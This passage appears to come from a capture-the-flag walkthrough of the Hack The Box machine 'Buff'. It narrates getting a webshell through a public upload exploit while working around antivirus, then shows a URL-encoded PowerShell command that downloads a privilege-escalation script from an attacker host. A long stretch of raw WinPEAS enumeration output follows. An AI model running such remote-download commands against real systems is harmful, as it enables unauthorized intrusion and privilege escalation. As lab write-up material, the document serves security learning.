Next, on port 8080, the Yujian (御剑) scanner found an upload path.
Searching for the path turns up an exploit:
<https://www.exploit-db.com/exploits/48506>
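Running it directly gives a webshell (there appears to be antivirus on the box: an eval with an obvious signature gets deleted outright, and certutil doesn't work well either), then download with PowerShell.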
powershell%20(new-object%20System.Net.WebClient).DownloadFile(%27http://10.10.16.2/winpeas.bat%27,%27C:\\xampp\\htdocs\\gym\\upload\\winpeas.bat%27)
WinPEAS enumeration:
by carlospolop
/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
WinPEAS should be used for authorized penetration testing and/or educational purposes only.
Any misuse of this software will not be the responsibility of the author or of any other collaborator.
Use it at your own networks and/or with the network owner's permission.
[*] BASIC SYSTEM INFO
[+] WINDOWS OS
[i] Check for vulnerabilities for the OS version with the applied patches
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits>
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 01/04/2022, 00:55:46
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,608 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,973 MB
Virtual Memory: In Use: 1,826 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::7d8e:5228:fa88:6508
[03]: dead:beef::b5ea:c90a:5da:c508
[04]: dead:beef::7d8e:5228:fa88:6508
[05]: dead:beef::8b
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
No Instance(s) Available.
"VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020 "
[i] Possible exploits (<https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat>)
No Instance(s) Available.
MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys)
No Instance(s) Available.
MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
No Instance(s) Available.
MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
No Instance(s) Available.
MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri)
No Instance(s) Available.
MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
No Instance(s) Available.
MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
No Instance(s) Available.
MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
No Instance(s) Available.
MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
No Instance(s) Available.
MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
No Instance(s) Available.
MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
No Instance(s) Available.
MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo)
No Instance(s) Available.
MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys)
No Instance(s) Available.
MS05-055 patch is NOT installed 2K/SP4-APC Data-Free)
No Instance(s) Available.
MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS)
No Instance(s) Available.
MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager)
No Instance(s) Available.
MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
No Instance(s) Available.
MS04-020 patch is NOT installed 2K/SP4-POSIX)
No Instance(s) Available.
MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
No Instance(s) Available.
MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
No Instance(s) Available.
MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
No Instance(s) Available.
MS14-070 patch is NOT installed 2K3/SP2-TCP/IP)
No Instance(s) Available.
MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
No Instance(s) Available.
MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei)
No Instance(s) Available.
MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu)
[+] DATE and TIME
[i] You may need to adjust your local date/time to exploit some vulnerability
01/04/2022
10:35
[+] Audit Settings
[i] Check what is being logged
[+] WEF Settings
[i] Check where are being sent the logs
[+] LAPS installed?
[i] Check what is being logged
[+] LSA protection?
[i] Active if "1"
[+] Credential Guard?
[i] Active if "1" or "2"
[+] WDigest?
[i] Plain-text creds in memory if "1"
[+] Number of cached creds
[i] You need System-rights to extract them
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
CACHEDLOGONSCOUNT REG_SZ 10
[+] UAC Settings
[i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
[+] Registered Anti-Virus(AV)
displayName=Windows Defender
Checking for defender whitelisted PATHS
[+] PowerShell settings
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 5.1.17134.1
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
[+] MOUNTED DISKS
[i] Maybe you find something interesting
Caption
C:
[+] ENVIRONMENT
[i] Interesting information?
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\shaun\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=BUFF
ComSpec=C:\Windows\system32\cmd.exe
CurrentLine= 0x1B[33m[+]0x1B[97m ENVIRONMENT
DriverData=C:\Windows\System32\Drivers\DriverData
E=0x1B[
expl=yes
LOCALAPPDATA=C:\Users\shaun\AppData\Local
long=false
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\shaun\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\shaun\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Percentage=1
PercentageTrack=19
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_LEVEL=23
PROCESSOR_REVISION=3100
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\shaun\AppData\Local\Temp
TMP=C:\Users\shaun\AppData\Local\Temp
USERDOMAIN=BUFF
USERNAME=shaun
USERPROFILE=C:\Users\shaun
windir=C:\Windows
AP_PARENT_PID=2152
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software>
Common Files
Common Files
internet explorer
Internet Explorer
Microsoft.NET
UNP
VMware
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
windows nt
windows nt
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\xampp
InstallLocation REG_SZ C:\Program Files\VMware\VMware Tools\
[+] Remote Desktop Credentials Manager
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager>
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus>
[+] RUNNING PROCESSES
[i] Something unexpected is running? Check for vulnerabilities
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes>
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 104 N/A
smss.exe 364 N/A
csrss.exe 444 N/A
wininit.exe 520 N/A
csrss.exe 540 N/A
winlogon.exe 620 N/A
services.exe 668 N/A
lsass.exe 676 N/A
svchost.exe 804 N/A
fontdrvhost.exe 820 N/A
fontdrvhost.exe 828 N/A
svchost.exe 868 N/A
svchost.exe 952 N/A
svchost.exe 996 N/A
dwm.exe 384 N/A
svchost.exe 396 N/A
svchost.exe 748 N/A
svchost.exe 1048 N/A
svchost.exe 1088 N/A
svchost.exe 1100 N/A
svchost.exe 1232 N/A
svchost.exe 1312 N/A
svchost.exe 1320 N/A
svchost.exe 1328 N/A
svchost.exe 1336 N/A
svchost.exe 1356 N/A
svchost.exe 1464 N/A
Memory Compression 1504 N/A
svchost.exe 1540 N/A
svchost.exe 1632 N/A
svchost.exe 1652 N/A
svchost.exe 1660 N/A
svchost.exe 1752 N/A
svchost.exe 1848 N/A
svchost.exe 1896 N/A
svchost.exe 1936 N/A
svchost.exe 1944 N/A
svchost.exe 1952 N/A
svchost.exe 1964 N/A
svchost.exe 1372 N/A
spoolsv.exe 2136 N/A
svchost.exe 2144 N/A
svchost.exe 2184 N/A
svchost.exe 2232 N/A
svchost.exe 2640 N/A
svchost.exe 2660 N/A
svchost.exe 2668 N/A
SecurityHealthService.exe 2692 N/A
svchost.exe 2700 N/A
svchost.exe 2716 N/A
vmtoolsd.exe 2728 N/A
svchost.exe 2736 N/A
svchost.exe 2752 N/A
VGAuthService.exe 2760 N/A
MsMpEng.exe 2772 N/A
svchost.exe 2788 N/A
svchost.exe 2996 N/A
svchost.exe 3052 N/A
svchost.exe 2724 N/A
dllhost.exe 3572 N/A
WmiPrvSE.exe 3752 N/A
msdtc.exe 4072 N/A
svchost.exe 4252 N/A
sihost.exe 4304 N/A
svchost.exe 4344 N/A
svchost.exe 4420 N/A
taskhostw.exe 4500 N/A
svchost.exe 4620 N/A
ctfmon.exe 4660 N/A
svchost.exe 4736 N/A
explorer.exe 4644 N/A
NisSrv.exe 5600 N/A
svchost.exe 5656 N/A
svchost.exe 5808 N/A
svchost.exe 5868 N/A
svchost.exe 5480 N/A
svchost.exe 5580 N/A
ShellExperienceHost.exe 2276 N/A
SearchUI.exe 6356 N/A
RuntimeBroker.exe 6500 N/A
RuntimeBroker.exe 6748 N/A
ApplicationFrameHost.exe 6792 N/A
SearchIndexer.exe 6860 N/A
MicrosoftEdge.exe 7052 N/A
browser_broker.exe 5464 N/A
svchost.exe 5384 N/A
RuntimeBroker.exe 1984 N/A
Windows.WARP.JITService.e 3920 N/A
RuntimeBroker.exe 7188 N/A
svchost.exe 7336 N/A
MicrosoftEdgeCP.exe 7744 N/A
MicrosoftEdgeCP.exe 7788 N/A
vmtoolsd.exe 7876 N/A
conhost.exe 6076 N/A
httpd.exe 2152 N/A
mysqld.exe 5840 N/A
svchost.exe 2896 N/A
svchost.exe 7284 N/A
httpd.exe 4188 N/A
svchost.exe 2940 N/A
SgrmBroker.exe 6772 N/A
svchost.exe 8064 N/A
svchost.exe 8560 N/A
Microsoft.Photos.exe 8852 N/A
RuntimeBroker.exe 8928 N/A
WinStore.App.exe 4936 N/A
RuntimeBroker.exe 1280 N/A
SystemSettings.exe 2484 N/A
taskhostw.exe 8876 N/A
svchost.exe 2464 N/A
svchost.exe 6372 N/A
svchost.exe 4052 N/A
svchost.exe 2512 N/A
svchost.exe 3064 N/A
cmd.exe 5024 N/A
conhost.exe 8480 N/A
cmd.exe 8124 N/A
conhost.exe 4764 N/A
WmiPrvSE.exe 7152 N/A
CloudMe.exe 9112 N/A
timeout.exe 5988 N/A
tasklist.exe 7248 N/A
[i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
C:\xampp\mysql\bin\mysqld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
[i] Checking directory permissions of running processes (DLL injection)
C:\xampp\apache\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\xampp\mysql\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\xampp\apache\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
[+] RUN AT STARTUP
[i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\desktop.ini BUILTIN\Administrators:(F)
C:\Documents and Settings\shaun\Start Menu\Programs\Startup NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUFF\shaun:(OI)(CI)(F)
C:\Documents and Settings\shaun\Start Menu\Programs\Startup\desktop.ini NT AUTHORITY\SYSTEM:(F)
BUFF\shaun:(F)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini BUILTIN\Administrators:(F)
C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUFF\shaun:(OI)(CI)(F)
C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini NT AUTHORITY\SYSTEM:(F)
BUFF\shaun:(F)
Folder: \
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\.NET Framework
.NET Framework NGEN v4.0.30319 N/A Ready
.NET Framework NGEN v4.0.30319 64 N/A Ready
Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
AD RMS Rights Policy Template Management N/A Ready
Folder: \Microsoft\Windows\AppID
Folder: \Microsoft\Windows\Application Experience
Microsoft Compatibility Appraiser 02/04/2022 04:05:16 Ready
ProgramDataUpdater N/A Ready
StartupAppTask N/A Ready
Folder: \Microsoft\Windows\ApplicationData
appuriverifierdaily N/A Ready
appuriverifierinstall N/A Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
Folder: \Microsoft\Windows\AppxDeploymentClient
Folder: \Microsoft\Windows\Autochk
Proxy N/A Ready
Folder: \Microsoft\Windows\BitLocker
BitLocker MDM policy Refresh N/A Ready
Folder: \Microsoft\Windows\Bluetooth
UninstallDeviceTask N/A Ready
Folder: \Microsoft\Windows\BrokerInfrastructure
BgTaskRegistrationMaintenanceTask N/A Ready
Folder: \Microsoft\Windows\Chkdsk
ProactiveScan N/A Ready
SyspartRepair N/A Ready
Folder: \Microsoft\Windows\CloudExperienceHost
CreateObjectTask N/A Ready
Folder: \Microsoft\Windows\Customer Experience Improvement Program
Consolidator 01/04/2022 12:00:00 Ready
UsbCeip N/A Ready
Folder: \Microsoft\Windows\Data Integrity Scan
Data Integrity Scan 10/04/2022 12:28:04 Ready
Data Integrity Scan for Crash Recovery N/A Ready
Folder: \Microsoft\Windows\Defrag
ScheduledDefrag N/A Ready
Folder: \Microsoft\Windows\Device Information
Device 02/04/2022 04:39:19 Ready
Folder: \Microsoft\Windows\Diagnosis
Scheduled N/A Ready
Folder: \Microsoft\Windows\DirectX
DXGIAdapterCache N/A Ready
Folder: \Microsoft\Windows\DiskCleanup
SilentCleanup N/A Ready
Folder: \Microsoft\Windows\DiskDiagnostic
Microsoft-Windows-DiskDiagnosticDataColl N/A Ready
Folder: \Microsoft\Windows\DiskFootprint
Diagnostics N/A Ready
StorageSense N/A Ready
Folder: \Microsoft\Windows\DUSM
dusmtask N/A Ready
Folder: \Microsoft\Windows\EDP
EDP App Launch Task N/A Ready
EDP Auth Task N/A Ready
EDP Inaccessible Credentials Task N/A Ready
StorageCardEncryption Task N/A Ready
Folder: \Microsoft\Windows\ExploitGuard
ExploitGuard MDM policy Refresh N/A Ready
Folder: \Microsoft\Windows\Feedback
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Feedback\Siuf
DmClient N/A Ready
DmClientOnScenarioDownload N/A Ready
Folder: \Microsoft\Windows\File Classification Infrastructure
Folder: \Microsoft\Windows\FileHistory
File History (maintenance mode) N/A Ready
Folder: \Microsoft\Windows\Flighting
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Flighting\FeatureConfig
ReconcileFeatures N/A Ready
Folder: \Microsoft\Windows\InstallService
ScanForUpdates 02/04/2022 02:52:26 Ready
ScanForUpdatesAsUser N/A Ready
Folder: \Microsoft\Windows\Live
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Location
Notifications N/A Ready
WindowsActionDialog N/A Ready
Folder: \Microsoft\Windows\Maintenance
WinSAT N/A Ready
Folder: \Microsoft\Windows\Management
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Management\Provisioning
Cellular N/A Ready
Logon N/A Ready
Folder: \Microsoft\Windows\Maps
MapsToastTask N/A Ready
Folder: \Microsoft\Windows\MemoryDiagnostic
ProcessMemoryDiagnosticEvents N/A Ready
RunFullMemoryDiagnostic N/A Ready
Folder: \Microsoft\Windows\Mobile Broadband Accounts
MNO Metadata Parser N/A Ready
Folder: \Microsoft\Windows\MUI
LPRemove N/A Ready
Folder: \Microsoft\Windows\Multimedia
SystemSoundsService N/A Running
Folder: \Microsoft\Windows\NetTrace
GatherNetworkInfo N/A Ready
Folder: \Microsoft\Windows\NlaSvc
WiFiTask N/A Ready
Folder: \Microsoft\Windows\Offline Files
Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Plug and Play
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
AnalyzeSystem N/A Ready
Folder: \Microsoft\Windows\Printing
EduPrintProv N/A Ready
Folder: \Microsoft\Windows\RecoveryEnvironment
Folder: \Microsoft\Windows\Servicing
StartComponentCleanup N/A Ready
Folder: \Microsoft\Windows\SettingSync
BackgroundUploadTask N/A Ready
NetworkStateChangeTask N/A Ready
Folder: \Microsoft\Windows\SharedPC
Folder: \Microsoft\Windows\Shell
CreateObjectTask N/A Ready
FamilySafetyMonitor N/A Ready
FamilySafetyRefreshTask N/A Ready
IndexerAutomaticMaintenance N/A Ready
Folder: \Microsoft\Windows\SpacePort
SpaceAgentTask N/A Ready
SpaceManagerTask N/A Ready
Folder: \Microsoft\Windows\Speech
HeadsetButtonPress N/A Ready
Folder: \Microsoft\Windows\Storage Tiers Management
Storage Tiers Management Initialization N/A Ready
Folder: \Microsoft\Windows\Subscription
EnableLicenseAcquisition N/A Ready
Folder: \Microsoft\Windows\Sysmain
ResPriStaticDbSync N/A Ready
WsSwapAssessmentTask N/A Ready
Folder: \Microsoft\Windows\SystemRestore
SR N/A Ready
Folder: \Microsoft\Windows\termsrv
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\termsrv\RemoteFX
RemoteFXWarningTask 19/04/2022 13:00:00 Ready
Folder: \Microsoft\Windows\TextServicesFramework
MsCtfMonitor N/A Ready
Folder: \Microsoft\Windows\Time Synchronization
ForceSynchronizeTime N/A Ready
SynchronizeTime N/A Ready
Folder: \Microsoft\Windows\Time Zone
SynchronizeTimeZone N/A Ready
Folder: \Microsoft\Windows\UNP
RunUpdateNotificationMgr 02/04/2022 15:52:51 Ready
Folder: \Microsoft\Windows\UPnP
UPnPHostConfig N/A Ready
Folder: \Microsoft\Windows\USB
Usb-Notifications N/A Ready
Folder: \Microsoft\Windows\WCM
WiFiTask N/A Ready
Folder: \Microsoft\Windows\Windows Defender
Windows Defender Cache Maintenance N/A Ready
Windows Defender Cleanup N/A Ready
Windows Defender Scheduled Scan N/A Ready
Windows Defender Verification N/A Ready
Folder: \Microsoft\Windows\Windows Error Reporting
QueueReporting 01/04/2022 11:20:54 Ready
Folder: \Microsoft\Windows\Windows Filtering Platform
BfeOnServiceStartTypeChange N/A Ready
Folder: \Microsoft\Windows\Windows Media Sharing
UpdateLibrary N/A Ready
Folder: \Microsoft\Windows\WindowsColorSystem
Calibration Loader N/A Ready
Folder: \Microsoft\Windows\WindowsUpdate
Scheduled Start N/A Ready
sih 01/04/2022 16:42:15 Ready
Folder: \Microsoft\Windows\Wininet
CacheTask N/A Running
Folder: \Microsoft\Windows\Work Folders
Work Folders Logon Synchronization N/A Ready
Work Folders Maintenance Work N/A Ready
Folder: \Microsoft\Windows\Workplace Join
Folder: \Microsoft\Windows\WwanSvc
NotificationTask N/A Ready
Folder: \Microsoft\XblGameSave
XblGameSaveTask N/A Ready
[+] AlwaysInstallElevated?
[i] If '1' then you can install a .msi file with admin privileges ;)
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated>
[*] NETWORK
[+] CURRENT SHARES
System error 5 has occurred.
Access is denied.
[+] INTERFACES
Windows IP Configuration
Host Name . . . . . . . . . . . . : BUFF
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-69-00
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::8b(Preferred)
Lease Obtained. . . . . . . . . . : 01 April 2022 00:55:59
Lease Expires . . . . . . . . . . : 01 April 2022 10:41:03
IPv6 Address. . . . . . . . . . . : dead:beef::7d8e:5228:fa88:6508(Preferred)
Temporary IPv6 Address. . . . . . : dead:beef::b5ea:c90a:5da:c508(Preferred)
Link-local IPv6 Address . . . . . : fe80::7d8e:5228:fa88:6508%10(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.10.198(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6ca8%10
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 218124374
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-D7-F7-E6-00-50-56-B9-69-00
DNS Servers . . . . . . . . . . . : 8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
[+] USED PORTS
[i] Check for services restricted from the outside
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5808
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 2940
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2152
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1100
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1464
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 676
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 5840
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 2940
TCP [::]:8080 [::]:0 LISTENING 2152
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1100
TCP [::]:49666 [::]:0 LISTENING 1464
TCP [::]:49667 [::]:0 LISTENING 2136
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 676
[+] FIREWALL
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Defender Firewall
Remote admin mode = Disable
Ports currently open on all network interfaces:
Port Protocol Version Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at <https://go.microsoft.com/fwlink/?linkid=121488> .
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound mysqld / C:\xampp\mysql\bin\mysqld.exe
Enable Inbound Apache HTTP Server / C:\xampp\apache\bin\httpd.exe
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at <https://go.microsoft.com/fwlink/?linkid=121488> .
[+] ARP
Interface: 10.10.10.198 --- 0xa
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-6c-a8 dynamic
10.10.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
[+] ROUTES
===========================================================================
Interface List
10...00 50 56 b9 69 00 ......vmxnet3 Ethernet Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.198 271
10.10.10.0 255.255.255.0 On-link 10.10.10.198 271
10.10.10.198 255.255.255.255 On-link 10.10.10.198 271
10.10.10.255 255.255.255.255 On-link 10.10.10.198 271
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 10.10.10.198 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 10.10.10.198 271
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
